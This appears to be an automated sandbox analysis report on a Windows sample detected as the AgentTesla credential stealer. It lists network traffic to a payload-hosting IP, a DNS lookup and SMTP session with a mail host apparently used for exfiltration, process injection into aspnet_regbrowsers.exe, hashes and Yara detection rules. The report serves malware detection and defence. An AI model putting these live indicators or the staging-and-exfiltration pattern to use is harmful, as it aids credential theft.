Network Behavior

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Nov 25, 2021 15:00:19.096450090 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.124773979 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.124922991 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.131431103 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.160027981 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.160068035 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.160084009 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.160100937 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.160116911 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.160132885 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.160149097 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.160170078 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.160187006 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.160187960 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.160207987 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.160213947 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.160239935 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.160264969 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.187566042 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.187591076 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.187608004 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.187624931 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.187639952 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.187659979 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.187685013 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.187704086 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.187706947 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.187733889 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.187752008 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.187755108 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.187771082 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.187786102 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.187803030 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.187820911 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.187823057 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.187855959 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.187869072 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.187886000 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.187902927 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.187918901 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.187922955 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.187942982 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.187943935 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.187961102 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.187978029 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.188011885 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.188040018 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.215025902 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215044975 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215080976 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215116024 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215145111 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.215164900 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.215234995 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215251923 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215290070 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.215327024 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215343952 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215359926 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215375900 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215393066 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215401888 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.215410948 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215435982 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.215454102 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.215454102 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215471983 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215487003 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215507030 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215517998 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.215555906 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.215589046 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215605974 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215621948 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215641022 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215651035 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.215682030 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.215689898 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215708971 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215724945 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215740919 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215754032 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.215761900 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215783119 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.215784073 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.215836048 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.215871096 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.216353893 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.216371059 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.216386080 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.216406107 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.216409922 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.216423988 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.216440916 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.216453075 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.216461897 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.216479063 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.216497898 CET  49722        80         192.168.2.5     194.85.248.219
Nov 25, 2021 15:00:19.216500044 CET  80           49722      194.85.248.219  192.168.2.5
Nov 25, 2021 15:00:19.216519117 CET  49722        80         192.168.2.5     194.85.248.219

UDP Packets

Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Nov 25, 2021 15:02:07.988897085 CET  58530        53         192.168.2.5  8.8.8.8
Nov 25, 2021 15:02:08.120956898 CET  53           58530      8.8.8.8      192.168.2.5

DNS Queries

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name              Type            Class
Nov 25, 2021 15:02:07.988897085 CET  192.168.2.5  8.8.8.8  0x1da     Standard query (0)  odin.mk-host.com  A (IP address)  IN (0x0001)

DNS Answers

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name              CName  Address         Type            Class
Nov 25, 2021 15:02:08.120956898 CET  8.8.8.8    192.168.2.5  0x1da     No error (0)  odin.mk-host.com         209.205.200.74  A (IP address)  IN (0x0001)

HTTP Request Dependency Graph

• 194.85.248.219

HTTP Packets

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.5  49722        194.85.248.219  80                C:\Users\user\Desktop\W7UbgU8x18.exe

Timestamp                            kBytes transferred  Direction  Data
Nov 25, 2021 15:00:19.131431103 CET  253                 OUT        GET /token_ta992i.txt HTTP/1.1
    Host: 194.85.248.219
    Connection: Keep-Alive
Nov 25, 2021 15:00:19.160027981 CET  254                 IN         HTTP/1.1 200 OK
    Content-Type: text/plain
    Last-Modified: Wed, 24 Nov 2021 19:04:41 GMT
    Accept-Ranges: bytes
    ETag: "55b9ce2266e1d71:0"
    Server: Microsoft-IIS/10.0
    Date: Thu, 25 Nov 2021 14:00:18 GMT
    Content-Length: 442789
Nov 25, 2021 15:00:19.393758059 CET  713                 OUT        GET /publickey.txt HTTP/1.1
    Host: 194.85.248.219
Nov 25, 2021 15:00:19.421961069 CET  714                 IN         HTTP/1.1 200 OK
    Content-Type: text/plain
    Last-Modified: Fri, 29 Oct 2021 16:21:13 GMT
    Accept-Ranges: bytes
    ETag: "cb9899fde0ccd71:0"
    Server: Microsoft-IIS/10.0
    Date: Thu, 25 Nov 2021 14:00:18 GMT
    Content-Length: 116559
Nov 25, 2021 15:00:21.621463060 CET  969                 OUT        GET /token_ta992i.txt HTTP/1.1
    Host: 194.85.248.219
Nov 25, 2021 15:00:21.650618076 CET  971                 IN         HTTP/1.1 200 OK
    Content-Type: text/plain
    Last-Modified: Wed, 24 Nov 2021 19:04:41 GMT
    Accept-Ranges: bytes
    ETag: "55b9ce2266e1d71:0"
    Server: Microsoft-IIS/10.0
    Date: Thu, 25 Nov 2021 14:00:21 GMT
    Content-Length: 442789
Nov 25, 2021 15:00:21.755748034 CET  1446                OUT        GET /publickey.txt HTTP/1.1
    Host: 194.85.248.219
Nov 25, 2021 15:00:21.783267021 CET  1447                IN         HTTP/1.1 200 OK
    Content-Type: text/plain
    Last-Modified: Fri, 29 Oct 2021 16:21:13 GMT
    Accept-Ranges: bytes
    ETag: "cb9899fde0ccd71:0"
    Server: Microsoft-IIS/10.0
    Date: Thu, 25 Nov 2021 14:00:21 GMT
    Content-Length: 116559


SMTP Packets

Timestamp                            Source Port  Dest Port  Source IP       Dest IP         Commands
Nov 25, 2021 15:02:08.517106056 CET  587          49817      209.205.200.74  192.168.2.5     220-odin.mk-host.com ESMTP Exim 4.94.2 #2 Thu, 25 Nov 2021 15:02:08 +0100
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 25, 2021 15:02:08.520540953 CET  49817        587        192.168.2.5     209.205.200.74  EHLO 179605
Nov 25, 2021 15:02:08.621891975 CET  587          49817      209.205.200.74  192.168.2.5     250-odin.mk-host.com Hello 179605 [84.17.52.63]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-STARTTLS
    250 HELP
Nov 25, 2021 15:02:08.622282982 CET  49817        587        192.168.2.5     209.205.200.74  STARTTLS
Nov 25, 2021 15:02:08.728094101 CET  587          49817      209.205.200.74  192.168.2.5     220 TLS go ahead

                                                                                            Code Manipulations

                                                                                            Statistics

                                                                                            Behavior


                                                                                            System Behavior

                                                                                            General

Start time: 15:00:16
Start date: 25/11/2021
Path: C:\Users\user\Desktop\W7UbgU8x18.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\W7UbgU8x18.exe"
Imagebase: 0x410000
File size: 24064 bytes
MD5 hash: 01F140FEA9669403791FB89C47138D69
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000000.264523511.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000000.264523511.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000000.258695502.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000000.258695502.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

                                                                                            General

Start time: 15:00:17
Start date: 25/11/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                            General

Start time: 15:00:19
Start date: 25/11/2021
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
Imagebase: 0xd70000
File size: 45160 bytes
MD5 hash: B490A24A9328FD89155F075FA26C0DEC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.250374714.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.250374714.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.512779528.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.512779528.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.249428029.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.249428029.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.250051529.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.250051529.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp, Author: Joe Security
Reputation: moderate

General

Start time: 15:00:21
Start date: 25/11/2021
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
Imagebase: 0x280000
File size: 45160 bytes
MD5 hash: B490A24A9328FD89155F075FA26C0DEC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 15:00:28
Start date: 25/11/2021
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 1396
Imagebase: 0x120000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Disassembly

Code Analysis
